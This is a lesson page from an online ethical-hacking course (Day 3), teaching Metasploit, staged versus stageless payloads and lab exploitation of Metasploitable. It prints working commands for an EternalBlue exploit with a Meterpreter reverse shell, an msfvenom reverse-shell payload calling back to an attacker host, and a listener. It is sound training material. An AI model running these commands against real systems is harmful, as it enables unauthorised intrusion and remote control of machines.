HomeEthical Hacking in 5 DaysDay 3
Day 3 of 5
⏱ ~60 minutes
Ethical Hacking in 5 Days — Day 3

Exploitation Fundamentals

Enumeration found the gaps — now you exploit them. Today covers the Metasploit Framework, manual exploitation techniques, and the ethical rules that separate penetration testers from criminals.

The Metasploit Framework

Metasploit is the world's most used penetration testing framework. It organizes exploits, payloads, and auxiliary modules into a consistent interface. msfconsole is the primary CLI. Workflows: search for a module, use it, set options (RHOSTS, LPORT), run. Metasploit handles shellcode generation, encoding, and handler setup automatically.

Manual Exploitation with Python

Framework tools don't cover everything. Custom exploits require understanding buffer overflows, format string vulnerabilities, and injection flaws. Python's socket and struct libraries let you craft raw packets. Understanding the underlying technique makes you far more effective than running canned modules blindly.

Payload Types: Staged vs. Stageless

A stageless payload (windows/x64/shell_reverse_tcp) embeds the entire shell. A staged payload (windows/x64/shell/reverse_tcp) sends a tiny stager first, which downloads the full payload. Stageless is simpler and more reliable through strict firewalls. Staged payloads are smaller and evade some AV signatures.

bash
# Metasploit workflow
msfconsole
msf6> search eternalblue
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> show options
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 192.168.1.50
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> run

# Generate standalone payload with msfvenom
msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf

# Set up listener
msf6> use multi/handler
msf6> set PAYLOAD linux/x64/shell_reverse_tcp
msf6> run
💡
Screenshot everything. Exploitation proof (a screenshot showing command output with IP, hostname, and whoami/id) is mandatory in professional pen-test reports.
📝 Day 3 Exercise
Exploit Metasploitable Services
  1. Launch msfconsole and search for the vsftpd 2.3.4 backdoor exploit
  2. Configure the exploit with RHOSTS set to your Metasploitable IP
  3. Run the exploit and confirm shell access with the 'id' command
  4. Find and exploit the UnrealIRCd backdoor using a second Metasploit module
  5. Document both exploits with screenshots for a mock report entry

Day 3 Summary

  • Metasploit organizes exploits, payloads, and listeners in one framework
  • msfvenom generates custom payloads for specific platforms
  • Staged payloads download the shell in two steps; stageless embeds everything
  • Screenshot exploitation proof — it is required in professional reports
  • Never run exploits outside your authorized scope
Challenge

Exploit the Metasploitable distcc daemon vulnerability manually using Netcat and a Python script (no Metasploit). Document the CVE number and the exact steps.

← Previous
Day 2: Scanning & Enumeration
Next →
Day 4: Post-Exploitation & Privilege Escalation
Finished this lesson?